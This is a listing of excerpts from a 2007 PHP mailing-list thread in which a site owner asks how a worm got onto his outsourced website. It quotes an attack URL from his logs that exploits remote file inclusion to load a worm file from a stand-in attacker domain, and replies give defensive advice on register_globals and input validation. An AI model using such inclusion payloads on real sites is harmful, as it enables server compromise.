[PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Seak, Teng-Fong
Stut wrote: Seak, Teng-Fong wrote: But after I've spent some time reading the log files, I've finally found out how the hackers managed to achieve worm infiltration. Actually, they're using an URL like this:

Re: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Dave Goodchild
Turn off register_globals - if you pollute your scripts with global variables like that you are asking for trouble. If you can't make sure you clean the variable. Using include($page.php) is asking for trouble. If you can get register_globals switched off (it's off by default in PHP5 for this

[PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Seak, Teng-Fong
Seak, Teng-Fong wrote: No, I don't deserve anything because, as I've written in the original post (but I suppose you didn't notice), the website is outsourced and made by a 3rd company. Well, I've just realised (and checked) that I forgot to mention that my company's website was outsourced.

RE: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Jim Moseby
Seak, Teng-Fong wrote: No, I don't deserve anything because, as I've written in the original post (but I suppose you didn't notice), the website is outsourced and made by a 3rd company. Then you should be having this conversation with the 3rd party. They need to validate *EVERY* bit of

Re: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms

2007-03-15 Thread Richard Lynch
On Thu, March 15, 2007 9:15 am, Seak, Teng-Fong wrote: Stut wrote: Seak, Teng-Fong wrote: But after I've spent some time reading the log files, I've finally found out how the hackers managed to achieve worm infiltration. Actually, they're using an URL like this:

RE: [PHP] Re: Question on virus/worms

2007-03-03 Thread Tim
-Message d'origine- De : Stut [mailto:[EMAIL PROTECTED] Envoyé : vendredi 2 mars 2007 20:23 À : Seak, Teng-Fong Cc : php-windows@lists.php.net; php-general@lists.php.net Objet : Re: [PHP] Re: Question on virus/worms Seak, Teng-Fong wrote: But after I've spent some time

RE: [PHP] Re: Question on virus/worms

2007-03-03 Thread Robert Cummings
On Sat, 2007-03-03 at 14:02 +0100, Tim wrote: Once you are comfortable with this, before you use a script downloaded from the inet in a production environment, go through the code and make sure you don't see any backdoor code (unecessary fsockopen(), exec() etc.. That isn't related to the

Re: [PHP] Re: Question on virus/worms

2007-03-02 Thread Stut
Seak, Teng-Fong wrote: But after I've spent some time reading the log files, I've finally found out how the hackers managed to achieve worm infiltration. Actually, they're using an URL like this: http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt? And